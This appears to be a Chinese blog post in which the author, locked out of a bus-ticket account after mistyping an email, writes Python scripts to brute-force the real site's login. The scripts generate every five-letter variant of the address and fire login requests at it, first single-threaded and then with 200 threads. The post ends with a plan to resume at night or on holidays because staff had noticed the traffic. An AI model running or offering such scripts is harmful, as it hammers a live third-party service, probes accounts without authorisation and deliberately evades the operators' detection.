本文共 2872 字，大约阅读时间需要 9 分钟。

在APP上申请了一个黄巴帐号，由于email输错了，导致买了七天的票不能使用，想找回， 公司却说只能找回密码，不能找回帐号，黄巴的网站也像一坨屎，居然email不经过验证直接可以用，导致你输错了都不知道，于是不甘心白白亏掉自己的12镑于是决定，暴力破解之。

先用Python生成帐号字典：

import osfrom string import ascii_lowercasepds=[]rg=ascii_lowercasefor first in rg:    for second in rg:        for third in rg:            for fourth in rg:                for fifth in rg:                    num= "tjiang@b%s%s%s%s%smouth.ac.uk"%(first,second,third,fourth,fifth)                    pds.append(num)file_object = open('user.txt', 'w')file_object.writelines(['%s%s' % (x,'\n') for x in pds])#file_object.writelines(['%s%s' % (x,os.linesep) for x in pds])file_object.close( )

然后构造程序模拟登录，暴力破解之

import requestsdef Login(user):   r = requests.post('https://www.bybus.co.uk/my/login', data={'field[email]': user, 'field[password]':'********', 'register':'Login Now'})   if 'Invalid' in r.text:      isFind = False   else:      isFind = True   return isFindfpath=r'C:\Users\RaiderJ\Desktop\crack\user.txt'pfile=open(fpath,'r')correct_set = set()for oneUser in pfile.readlines():    if Login(oneUser):       print 'success-' + oneUser       correct_set.add(oneUser)    else:       print 'failed-' + oneUserthefile = open('correct.txt', 'w')for item in correct_set:  thefile.write("%s\n" % item)thefile.close()

好了， 开始遍历了。 不过貌似单线程速度很慢，后面让我们开始多线程，并行破解吧

多线程程序

import threadingimport Queueimport requestsmutex = threading.Lock()#Number of threadsn_thread = 200#Create queuequeue = Queue.Queue()def Login(user):   r = requests.post('https://www.bybus.co.uk/my/login', data={'field[email]': user, 'field[password]':'*******', 'register':'Login Now'})   if 'Invalid' in r.text:      isFind = False   else:      isFind = True   return isFinddef WriteOut(user):   with open(r"C:\Users\seamanj\Desktop\crack\correct.txt", "a") as myfile:      myfile.write(user)      myfile.close()      class ThreadClass(threading.Thread):    def __init__(self, queue):        threading.Thread.__init__(self)    #Assign thread working with queue        self.queue = queue    def run(self):        while True:        #Get from queue job            oneUser = self.queue.get()            print self.getName() + ':get' + str(queue.qsize()) + '\n'            if Login(oneUser):               print 'success-' + oneUser + '\n'               if mutex.acquire():                  WriteOut(oneUser)                  mutex.release()            else:               print 'failed-' + oneUser + '\n'            self.queue.task_done()#Create number processfor i in range(n_thread):    t = ThreadClass(queue)    t.setDaemon(True)    #Start thread    t.start()#Read file line by linehostfile = open("user.txt","r")for line in hostfile:    #Put line to queue    queue.put(line)    print 'put' + str(queue.qsize()) + '\n'#wait on the queue until everything has been processed queue.join()

不过好像连接太频繁了, 被工作人员发现了

还是等到夜里, 或者过节的时候再crack吧